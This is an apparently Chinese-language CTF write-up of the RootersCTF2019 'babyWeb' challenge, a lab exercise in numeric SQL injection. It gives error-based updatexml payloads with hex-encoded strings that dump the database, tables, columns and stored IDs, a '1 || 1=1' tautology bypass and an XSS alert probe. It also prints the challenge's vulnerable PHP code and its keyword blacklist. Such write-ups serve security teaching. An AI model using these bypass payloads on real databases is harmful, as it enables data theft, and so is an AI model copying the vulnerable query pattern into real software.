[RootersCTF2019]babyWeb

[RootersCTF2019]babyWeb

考点

  • 注入类型判断

  • 报错注入

  • 万能密码

  • or绕过

  • 单双引号绕过

wp

给了提示

  1. 密码是18位数字

  2. 禁止输入字母和UNION SLEEP ' " OR - BENCHMARK

请求search=1返回语句SELECT * FROM users WHERE uniqueid=1

输入0%23返回SELECT * FROM users WHERE uniqueid=0#,应该是数字型注入

输入1^1返回的是SELECT * FROM users WHERE uniqueid=1^1,就很奇怪

那就试试search=<script>alert(1)</script>,结果弹框了,这里应该是服务端把GET请求的search原封不动的返回了

输入<>提示SQL语法错误,信息为check the manual that corresponds to your MariaDB server version for the right syntax to use near '<>' at line 1

直接试试order by呢,用大一点的数试试,输入1 order by 5,返回Unknown column '5' in 'order clause'

输入1 order by 2返回了正常信息,说明查询的列数是2

第一种解法:报错注入

这里可以下判断,是无回显的数字型注入,有报错信息,试试报错注入。

ban了or,可以使用and或者||;ban了单双引号,可以使用十六进制

search=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)%23
sql_injection

search=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x73716C5F696E6A656374696F6E),0x7e),1)%23
users

search=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),0x7e),1)%23
search=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=0x7573657273 limit 4,1),0x7e),1)%23
USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,user,uniqueid

search=1 and updatexml(1,concat(0x7e,(select count(uniqueid) from users),0x7e),1)%23
2

search=1 and updatexml(1,concat(0x7e,(select group_concat(uniqueid) from users),0x7e),1)%23
837461526918364526,123456789928466788

使用837461526918364526即可

第二种解法:万能密码

payload:1 || 1=1 limit 0,1,使用1 || 1=1会列出所有的id,需要用limit控制输出

核心代码

if(isset($_GET['search'])){
  $search = $_GET['search'];
  if(preg_match('/(union|sleep|\'|\"| or |-|benchmark)/i', $search)){
    exit();
  }
  else{
    $query = "SELECT * FROM users WHERE uniqueid=$search";
    $result=mysqli_query($link,$query) or die(mysqli_error($link));
    $count = mysqli_num_rows($result);
    if(mysqli_num_rows($result) === 1){
      while($row = mysqli_fetch_array($result)){
        $pass = $row['uniqueid'];
      }
      header("Location: https://babyweb.rootersctf.in/flag0flag0123456789.php?id=".$pass);
      die();
    }

    echo $query;
  }
}

小结

  1. 类似题目,[b01lers2020]Life on Mars是输入字符串但是是数字型注入,本题是输入数字回显原文的数字型注入

  2. ban了or,可以使用and或者||

  3. ban了单双引号,可以使用十六进制

上一页[RCTF2015]EasySQL下一页[SUCTF 2018]MultiSQL

最后更新于